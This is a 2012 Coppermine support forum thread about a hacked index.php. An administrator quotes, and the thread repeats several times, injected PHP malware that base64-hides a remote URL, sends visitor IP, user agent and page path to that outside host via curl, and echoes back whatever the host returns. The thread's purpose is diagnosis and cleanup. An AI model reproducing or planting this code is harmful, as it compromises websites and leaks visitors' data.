Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: error 452 in file index.php  (Read 6267 times)

0 Members and 1 Guest are viewing this topic.

tortech

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 22
error 452 in file index.php
« on: November 29, 2012, 01:43:02 pm »

Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php
Logged

Αndré

  • Administrator
  • Coppermine addict
  • *****
  • Country: de
  • Offline Offline
  • Gender: Male
  • Posts: 15764
Re: error 452 in file index.php
« Reply #1 on: November 29, 2012, 02:14:08 pm »

Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.


change atrib 755 to 644 for file named index.php
I doubt that this will change anything.
Logged

tortech

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 22
Re: Re: error 452 in file index.php
« Reply #2 on: November 29, 2012, 03:12:05 pm »

Thank you for answer and solve a problem.


Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.
Logged

tortech

  • Coppermine novice
  • *
  • Offline Offline
  • Posts: 22
Re: Re: error 452 in file index.php
« Reply #3 on: December 02, 2012, 12:56:24 pm »

What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?


Have a look at that line:
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
Code: [Select]
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.
Logged

Αndré

  • Administrator
  • Coppermine addict
  • *****
  • Country: de
  • Offline Offline
  • Gender: Male
  • Posts: 15764
Re: error 452 in file index.php
« Reply #4 on: December 03, 2012, 10:51:14 am »

I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).
Logged

Veronica

  • Contributor
  • Coppermine frequent poster
  • ***
  • Country: se
  • Offline Offline
  • Posts: 106
  • Coppermine 1.5.22
Re: error 452 in file index.php
« Reply #5 on: December 03, 2012, 11:08:15 am »

This is a Wordpress hack described in detail here
http://www.jexanalytics.com/2012/02/wordpress-sites-all-hacked/
Logged

Αndré

  • Administrator
  • Coppermine addict
  • *****
  • Country: de
  • Offline Offline
  • Gender: Male
  • Posts: 15764
Re: error 452 in file index.php
« Reply #6 on: December 03, 2012, 11:30:19 am »

As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.
Logged
Pages: [1]   Go Up
 

Page created in 0.03 seconds with 19 queries.